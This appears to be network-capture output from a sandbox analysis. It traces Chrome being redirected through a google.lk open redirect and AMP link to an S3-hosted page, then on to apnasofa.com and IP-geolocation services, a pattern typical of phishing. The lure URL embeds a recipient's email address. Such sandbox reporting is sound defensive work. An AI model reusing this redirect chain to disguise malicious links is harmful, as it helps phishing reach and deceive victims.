                                                        Nov 29, 2024 14:30:20.852838039 CET4434971923.195.76.153192.168.2.16
                                                        Nov 29, 2024 14:30:20.852905035 CET49719443192.168.2.1623.195.76.153
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 29, 2024 14:29:49.702469110 CET5036153192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:29:49.702910900 CET5179153192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:29:49.776638031 CET53600711.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:29:49.849447012 CET53546401.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:29:49.944720030 CET53517911.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:29:49.949826956 CET53503611.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:29:52.528791904 CET6010653192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:29:52.528934956 CET6011153192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:29:52.663666010 CET53560151.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:29:52.669253111 CET53601061.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:29:52.752234936 CET53601111.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:29:54.446902037 CET5958553192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:29:54.447057009 CET4952653192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:29:54.584619999 CET53595851.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:29:54.584630966 CET53495261.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:29:58.209448099 CET6498153192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:29:58.209598064 CET6129653192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:29:58.523221970 CET53649811.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:29:58.536281109 CET53612961.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:00.514182091 CET5839853192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:00.514408112 CET6004953192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:00.687557936 CET4927053192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:01.531533957 CET5069453192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:01.531819105 CET6459253192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:01.731014967 CET53506941.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:01.732130051 CET53645921.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:01.736231089 CET53600491.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:01.736247063 CET53583981.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:07.400396109 CET6430653192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:07.401323080 CET5484353192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:07.403426886 CET5399253192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:07.403594017 CET5301553192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:07.537883997 CET53643061.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:07.542067051 CET53530151.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:07.542105913 CET53539921.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:07.543523073 CET53570131.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:07.545537949 CET53548431.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:09.298547029 CET4942453192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:09.298686981 CET5729953192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:09.298937082 CET5651253192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:09.299051046 CET5401053192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:09.440345049 CET53565121.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:09.448843956 CET53540101.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:09.612643957 CET53499791.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:09.842911005 CET53494241.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:09.843103886 CET53572991.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:12.676768064 CET5941153192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:12.677117109 CET5371553192.168.2.161.1.1.1
                                                        Nov 29, 2024 14:30:12.815521002 CET53594111.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:12.816716909 CET53537151.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:14.110424995 CET53635811.1.1.1192.168.2.16
                                                        Nov 29, 2024 14:30:28.596900940 CET53546491.1.1.1192.168.2.16
                                                        TimestampSource IPDest IPChecksumCodeType
                                                        Nov 29, 2024 14:29:52.752300024 CET192.168.2.161.1.1.1c22b(Port unreachable)Destination Unreachable
                                                        Nov 29, 2024 14:30:01.736326933 CET192.168.2.161.1.1.1c23e(Port unreachable)Destination Unreachable
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Nov 29, 2024 14:29:49.702469110 CET192.168.2.161.1.1.10x174aStandard query (0)google.lkA (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:49.702910900 CET192.168.2.161.1.1.10xe820Standard query (0)google.lk65IN (0x0001)false
                                                        Nov 29, 2024 14:29:52.528791904 CET192.168.2.161.1.1.10x7e1Standard query (0)www.google.lkA (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:52.528934956 CET192.168.2.161.1.1.10x6b6bStandard query (0)www.google.lk65IN (0x0001)false
                                                        Nov 29, 2024 14:29:54.446902037 CET192.168.2.161.1.1.10xd730Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:54.447057009 CET192.168.2.161.1.1.10x6150Standard query (0)www.google.com65IN (0x0001)false
                                                        Nov 29, 2024 14:29:58.209448099 CET192.168.2.161.1.1.10xd56aStandard query (0)i--iy.s3.us-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:58.209598064 CET192.168.2.161.1.1.10x66c4Standard query (0)i--iy.s3.us-east-1.amazonaws.com65IN (0x0001)false
                                                        Nov 29, 2024 14:30:00.514182091 CET192.168.2.161.1.1.10xb8d4Standard query (0)apnasofa.comA (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:00.514408112 CET192.168.2.161.1.1.10xfbb8Standard query (0)apnasofa.com65IN (0x0001)false
                                                        Nov 29, 2024 14:30:00.687557936 CET192.168.2.161.1.1.10x88ffStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:01.531533957 CET192.168.2.161.1.1.10x78dStandard query (0)apnasofa.comA (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:01.531819105 CET192.168.2.161.1.1.10xe8cdStandard query (0)apnasofa.com65IN (0x0001)false
                                                        Nov 29, 2024 14:30:07.400396109 CET192.168.2.161.1.1.10xf629Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:07.401323080 CET192.168.2.161.1.1.10xad86Standard query (0)api.ipify.org65IN (0x0001)false
                                                        Nov 29, 2024 14:30:07.403426886 CET192.168.2.161.1.1.10x4fc9Standard query (0)apnasofa.comA (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:07.403594017 CET192.168.2.161.1.1.10xa2dbStandard query (0)apnasofa.com65IN (0x0001)false
                                                        Nov 29, 2024 14:30:09.298547029 CET192.168.2.161.1.1.10xd60aStandard query (0)ipwhois.appA (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:09.298686981 CET192.168.2.161.1.1.10x897cStandard query (0)ipwhois.app65IN (0x0001)false
                                                        Nov 29, 2024 14:30:09.298937082 CET192.168.2.161.1.1.10xde3cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:09.299051046 CET192.168.2.161.1.1.10x7322Standard query (0)api.ipify.org65IN (0x0001)false
                                                        Nov 29, 2024 14:30:12.676768064 CET192.168.2.161.1.1.10x4c33Standard query (0)ipwhois.appA (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:12.677117109 CET192.168.2.161.1.1.10x29fbStandard query (0)ipwhois.app65IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Nov 29, 2024 14:29:49.949826956 CET1.1.1.1192.168.2.160x174aNo error (0)google.lk142.250.181.67A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:52.021992922 CET1.1.1.1192.168.2.160x582dNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                        Nov 29, 2024 14:29:52.021992922 CET1.1.1.1192.168.2.160x582dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.208.106A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:52.021992922 CET1.1.1.1192.168.2.160x582dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.56.99A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:52.021992922 CET1.1.1.1192.168.2.160x582dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.56.102A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:52.021992922 CET1.1.1.1192.168.2.160x582dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.59.35A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:52.021992922 CET1.1.1.1192.168.2.160x582dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.208.67A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:52.021992922 CET1.1.1.1192.168.2.160x582dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.208.68A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:52.021992922 CET1.1.1.1192.168.2.160x582dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.211.24A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:52.021992922 CET1.1.1.1192.168.2.160x582dNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.211.20A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:52.669253111 CET1.1.1.1192.168.2.160x7e1No error (0)www.google.lk172.217.19.227A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:54.584619999 CET1.1.1.1192.168.2.160xd730No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:54.584630966 CET1.1.1.1192.168.2.160x6150No error (0)www.google.com65IN (0x0001)false
                                                        Nov 29, 2024 14:29:58.523221970 CET1.1.1.1192.168.2.160xd56aNo error (0)i--iy.s3.us-east-1.amazonaws.coms3-r-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                        Nov 29, 2024 14:29:58.523221970 CET1.1.1.1192.168.2.160xd56aNo error (0)s3-r-w.us-east-1.amazonaws.com16.182.103.34A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:58.523221970 CET1.1.1.1192.168.2.160xd56aNo error (0)s3-r-w.us-east-1.amazonaws.com54.231.233.98A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:58.523221970 CET1.1.1.1192.168.2.160xd56aNo error (0)s3-r-w.us-east-1.amazonaws.com52.217.131.162A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:58.523221970 CET1.1.1.1192.168.2.160xd56aNo error (0)s3-r-w.us-east-1.amazonaws.com52.216.63.74A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:58.523221970 CET1.1.1.1192.168.2.160xd56aNo error (0)s3-r-w.us-east-1.amazonaws.com52.217.132.242A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:58.523221970 CET1.1.1.1192.168.2.160xd56aNo error (0)s3-r-w.us-east-1.amazonaws.com54.231.160.10A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:58.523221970 CET1.1.1.1192.168.2.160xd56aNo error (0)s3-r-w.us-east-1.amazonaws.com52.217.197.250A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:58.523221970 CET1.1.1.1192.168.2.160xd56aNo error (0)s3-r-w.us-east-1.amazonaws.com16.15.184.222A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:29:58.536281109 CET1.1.1.1192.168.2.160x66c4No error (0)i--iy.s3.us-east-1.amazonaws.coms3-r-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                        Nov 29, 2024 14:30:00.825629950 CET1.1.1.1192.168.2.160x88ffNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 29, 2024 14:30:01.731014967 CET1.1.1.1192.168.2.160x78dNo error (0)apnasofa.com103.160.107.138A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:01.736247063 CET1.1.1.1192.168.2.160xb8d4No error (0)apnasofa.com103.160.107.138A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:07.537883997 CET1.1.1.1192.168.2.160xf629No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:07.537883997 CET1.1.1.1192.168.2.160xf629No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:07.537883997 CET1.1.1.1192.168.2.160xf629No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:07.542105913 CET1.1.1.1192.168.2.160x4fc9No error (0)apnasofa.com103.160.107.138A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:07.545537949 CET1.1.1.1192.168.2.160xad86No error (0)api.ipify.org65IN (0x0001)false
                                                        Nov 29, 2024 14:30:09.440345049 CET1.1.1.1192.168.2.160xde3cNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:09.440345049 CET1.1.1.1192.168.2.160xde3cNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:09.440345049 CET1.1.1.1192.168.2.160xde3cNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:09.448843956 CET1.1.1.1192.168.2.160x7322No error (0)api.ipify.org65IN (0x0001)false
                                                        Nov 29, 2024 14:30:09.842911005 CET1.1.1.1192.168.2.160xd60aNo error (0)ipwhois.app103.126.138.87A (IP address)IN (0x0001)false
                                                        Nov 29, 2024 14:30:12.815521002 CET1.1.1.1192.168.2.160x4c33No error (0)ipwhois.app103.126.138.87A (IP address)IN (0x0001)false
                                                        • google.lk
                                                        • www.google.lk
                                                        • fs.microsoft.com
                                                        • i--iy.s3.us-east-1.amazonaws.com
                                                        • slscr.update.microsoft.com
                                                        • armmf.adobe.com
                                                        • https:
                                                          • apnasofa.com
                                                          • api.ipify.org
                                                          • ipwhois.app
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.1649697142.250.181.674436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:29:51 UTC914OUTGET /url?q=mogrady@hollandco.com&hollandco.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1
                                                        Host: google.lk
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-29 13:29:52 UTC752INHTTP/1.1 301 Moved Permanently
                                                        Location: https://www.google.lk/url?q=mogrady@hollandco.com&hollandco.com=&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-doDkPWEVSSX16gi1_Sla3w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                        Permissions-Policy: unload=()
                                                        Date: Fri, 29 Nov 2024 13:29:52 GMT
                                                        Expires: Sun, 29 Dec 2024 13:29:52 GMT
                                                        Cache-Control: public, max-age=2592000
                                                        Server: gws
                                                        Content-Length: 337
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2024-11-29 13:29:52 UTC337INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 6c 6b 2f 75 72 6c 3f 71 3d 6d 6f 67 72 61 64 79 40 68 6f 6c 6c 61 6e 64 63 6f 2e 63 6f 6d 26 61 6d 70 3b 68 6f 6c 6c 61 6e 64 63 6f 2e 63 6f 6d 3d 26 61 6d 70 3b 73 61 3d 74 26 61 6d 70 3b 75 72 6c 3d 61
                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.lk/url?q=mogrady@hollandco.com&amp;hollandco.com=&amp;sa=t&amp;url=a


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.1649704172.217.19.2274436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:29:54 UTC919OUTGET /url?q=mogrady@hollandco.com&hollandco.com=&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1
                                                        Host: www.google.lk
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-29 13:29:55 UTC1036INHTTP/1.1 302 Found
                                                        Location: https://www.google.lk/amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
                                                        Cache-Control: private
                                                        Content-Type: text/html; charset=UTF-8
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-GdAAPijhG-wqddR3uQvqfA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                        Permissions-Policy: unload=()
                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                        Date: Fri, 29 Nov 2024 13:29:55 GMT
                                                        Server: gws
                                                        Content-Length: 273
                                                        X-XSS-Protection: 0
                                                        Set-Cookie: NID=519=DDeekMNhAIJgi7-FQimRZKHh_SHVXj2ClM4BCrUTOPsJeeLqJ1Ng0eNt7uDjcx6ARg2It0QZzDETItUetVyD-kZOeICtXwpPx0gX02MUCNb41auc_sVTbNPqXqLhu64zqpAUwk2ynse-2ezVpGnIiSO9AQy5sdhJH1eOp-mFlKt3yAsLoMDUCDEn894-yOQRI_VcZA; expires=Sat, 31-May-2025 13:29:55 GMT; path=/; domain=.google.lk; Secure; HttpOnly; SameSite=none
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2024-11-29 13:29:55 UTC273INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 6c 6b 2f 61 6d 70 2f 73 2f 69 2d 2d 69 79 2e 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 76 6f 63 61 62 75 6c 61 72 79 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e
                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.lk/amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html">here</A>.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.16497092.18.84.141443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:29:55 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: fs.microsoft.com
                                                        2024-11-29 13:29:56 UTC479INHTTP/1.1 200 OK
                                                        Content-Type: application/octet-stream
                                                        Server: Kestrel
                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                        X-Ms-ApiVersion: Distribute 1.2
                                                        X-Ms-Region: prod-weu-z1
                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                        X-OSID: 2
                                                        X-CID: 2
                                                        X-CCC: GB
                                                        Cache-Control: public, max-age=133796
                                                        Date: Fri, 29 Nov 2024 13:29:55 GMT
                                                        Connection: close
                                                        X-CID: 2


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.1649714172.217.19.2274436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:29:57 UTC1083OUTGET /amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1
                                                        Host: www.google.lk
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: NID=519=DDeekMNhAIJgi7-FQimRZKHh_SHVXj2ClM4BCrUTOPsJeeLqJ1Ng0eNt7uDjcx6ARg2It0QZzDETItUetVyD-kZOeICtXwpPx0gX02MUCNb41auc_sVTbNPqXqLhu64zqpAUwk2ynse-2ezVpGnIiSO9AQy5sdhJH1eOp-mFlKt3yAsLoMDUCDEn894-yOQRI_VcZA
                                                        2024-11-29 13:29:58 UTC825INHTTP/1.1 302 Found
                                                        Location: https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
                                                        Cache-Control: private
                                                        X-Robots-Tag: noindex
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-CL6ijN7wRKE-1VSMdIlqCg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                        Permissions-Policy: unload=()
                                                        Date: Fri, 29 Nov 2024 13:29:57 GMT
                                                        Server: gws
                                                        Content-Length: 253
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2024-11-29 13:29:58 UTC253INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 69 2d 2d 69 79 2e 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 76 6f 63 61 62 75 6c 61 72 79 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html">here</A>.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.16497152.18.84.141443
                                                        TimestampBytes transferredDirectionData
